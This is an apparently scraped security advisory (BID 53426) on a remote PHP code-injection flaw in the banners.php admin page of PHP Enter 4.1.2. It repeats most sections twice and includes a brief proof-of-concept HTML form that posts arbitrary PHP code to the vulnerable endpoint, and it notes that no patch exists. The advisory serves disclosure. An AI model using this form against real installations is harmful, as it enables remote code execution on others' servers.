PHP Enter 'banners.php' PHP Code Injection Vulnerability
BID:53426
Info
PHP Enter 'banners.php' PHP Code Injection Vulnerability
| Bugtraq ID: | 53426 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 08 2012 12:00AM |
| Updated: | May 08 2012 12:00AM |
| Credit: | L3b-r1'z |
| Vulnerable: |
phpenter.net PHP Enter 4.1.2 |
| Not Vulnerable: | |
Discussion
PHP Enter 'banners.php' PHP Code Injection Vulnerability
PHP Enter is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
PHP Enter 4.1.2 is vulnerable; other versions may also be affected.
PHP Enter is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
PHP Enter 4.1.2 is vulnerable; other versions may also be affected.
Exploit / POC
PHP Enter 'banners.php' PHP Code Injection Vulnerability
Attackers can exploit this issue through a browser.
The following proof-of-concept is available:
<form method="post" action="http://www.example.com/admin/banners.php">
<center>
<font color=#3A586A>Code</font><br />
<textarea name="code"></textarea>
<br /><br />
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
</form>
Attackers can exploit this issue through a browser.
The following proof-of-concept is available:
<form method="post" action="http://www.example.com/admin/banners.php">
<center>
<font color=#3A586A>Code</font><br />
<textarea name="code"></textarea>
<br /><br />
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
</form>
Solution / Fix
PHP Enter 'banners.php' PHP Code Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP Enter 'banners.php' PHP Code Injection Vulnerability
References:
References:
- PHP Enter Homepage (phpenter.net)